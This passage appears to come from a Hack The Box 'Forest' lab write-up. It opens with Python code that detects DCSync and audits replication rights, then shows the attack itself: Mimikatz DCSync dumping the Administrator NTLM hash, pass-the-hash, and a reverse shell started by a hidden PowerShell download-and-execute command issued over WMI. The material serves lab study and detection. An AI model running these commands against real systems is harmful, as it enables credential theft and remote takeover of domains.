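        holder = ace["IdentityReference"].split("\\")[-1]
        if holder.lower() in expected_holders:
            continue
        findings.append((ace["IdentityReference"], right))
    return findings


def detect_dcsync(events, allowlist=frozenset()):
    """4662 events where a non-machine account exercised a replication right on the domain."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = sorted({REPLICATION_RIGHTS[g.lower()]
                         for g in GUID_RE.findall(ev.get("Properties", ""))
                         if g.lower() in REPLICATION_RIGHTS})
        if not rights:
            continue
        subject = ev["SubjectUserName"]
        # Domain controllers replicate with each other constantly; their machine accounts
        # end in '$' and are the expected source of these events.
        if subject.endswith("$") or subject.lower() in allowlist:
            continue
        alerts.append({"subject": f"{ev['SubjectDomainName']}\\{subject}", "rights": rights,
                       # Get-Changes-All is the right that returns secrets (password hashes).
                       "secrets_read": "DS-Replication-Get-Changes-All" in rights})
    return alerts


if __name__ == "__main__":
    print("unexpected replication rights:", audit_domain_acl(SAMPLE_ACES))
    print("DCSync alerts:", detect_dcsync(SAMPLE_EVENTS))
```

The ACL audit catches the grant at the moment of the `Add-DomainObjectAcl` call (or on the next scheduled run); the 4662 rule catches the `lsadump::dcsync` in the next section, and requires the "Directory Service Access" audit subcategory to be enabled on the DCs and a SACL on the domain root that audits Control Access for Everyone.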
(Win) Running DCSync
Run DCSync using Mimikatz.
> . .\Invoke-Mimikatz.ps1
> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:administrator"'
.#####. mimikatz 2.2.0 (x64) #18362 May 30 2019 09:58:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::dcsync /domain:htb.local /user:administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : Administrator@htb.local
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/01/01 9:00:00
Password last change : 2019/09/19 2:09:08
Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID : 500
Credentials:
Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6
(Win) Pass the Hash and flag retrieval
Using the HTB\Administrator NTLM hash obtained above, perform Pass the Hash and launch powershell.exe.
> . .\Invoke-Mimikatz.ps1
> Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:htb.local /ntlm:32693b11e6aa90eb43d32c72a07ceea6 /run:powershell.exe"'
.#####. mimikatz 2.2.0 (x64) #18362 May 30 2019 09:58:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::pth /user:administrator /domain:htb.local /ntlm:32693b11e6aa90eb43d32c72a07ceea6 /run:powershell.exe
user : administrator
domain : htb.local
program : powershell.exe
impers. : no
NTLM : 32693b11e6aa90eb43d32c72a07ceea6
| PID 5208
| TID 4580
| LSA Process is now R/W
| LUID 0 ; 2390802 (00000000:00247b12)
\_ msv1_0 - data copy @ 0000014D97AC7280 : OK !
\_ kerberos - data copy @ 0000014D9745DE68
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 0000014D97AB49F8 (32) -> null
Retrieve the flags from the launched powershell.exe.
> ls \\forest.htb.local\c$\Users\
ディレクトリ: \\forest.htb.local\c$\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2019/09/19 2:09 Administrator
d-r--- 2016/11/21 11:39 Public
d----- 2019/09/23 7:29 sebastien
d----- 2019/09/23 8:02 svc-alfresco
> cat '\\forest.htb.local\c$\Users\svc-alfresco\Desktop\user.txt'
> cat '\\forest.htb.local\c$\Users\Administrator\Desktop\root.txt'
(Win) Reverse shell
I try whether a reverse shell can be obtained.
The following tool was used.
Append the final line shown below to the end of Invoke-PowerShellTcp.ps1, save it as Invoke-PowerShellTcpEx.ps1, and expose it with a web-server-like service.
(snip)
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress (your-IP) -Port 9999
Listen for the connection with powercat.
> powercat -v -l -p 9999 -t 2000
詳細: Set Stream 1: TCP
詳細: Set Stream 2: Console
詳細: Setting up Stream 1...
詳細: Listening on [0.0.0.0] (port 9999)
Run powershell on forest.htb.local via WMI to fetch and execute Invoke-PowerShellTcpEx.ps1.
> wmic /node:10.10.10.161 process call create "powershell.exe -NoP -sta -NonI -W Hidden iex (New-Object Net.WebClient).DownloadString('http://(your-IP)/Invoke-PowerShellTcpEx.ps1')"
(Win32_Process)->Create() を実行しています
メソッドが正しく実行しました。
出力パラメーター
instance of __PARAMETERS
{
ProcessId = 2964;
ReturnValue = 0;
};
The reverse shell starts.
> powercat -v -l -p 9999 -t 2000
詳細: Set Stream 1: TCP
詳細: Set Stream 2: Console
詳細: Setting up Stream 1...
詳細: Listening on [0.0.0.0] (port 9999)
詳細: Connection from [10.10.10.161] port [tcp] accepted (source port 62903)
詳細: Setting up Stream 2...
詳細: Both Communication Streams Established. Redirecting Data Between Streams...
Windows PowerShell running as user Administrator on FOREST
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> hostname
FOREST
PS C:\Windows\system32> whoami
htb\administrator
Closing
Contrary to Hack The Box etiquette, I went all the way to administrator privileges first and only then picked up the user flag as well.
According to a certain guru who got the flags before me, it was possible without adding a new user, but I did not want to affect other players too much, so I added a new user (though perhaps that is six of one, half a dozen of the other).
References
[1] Roasting AS-REPs
[2] Domain object DACL privilege escalation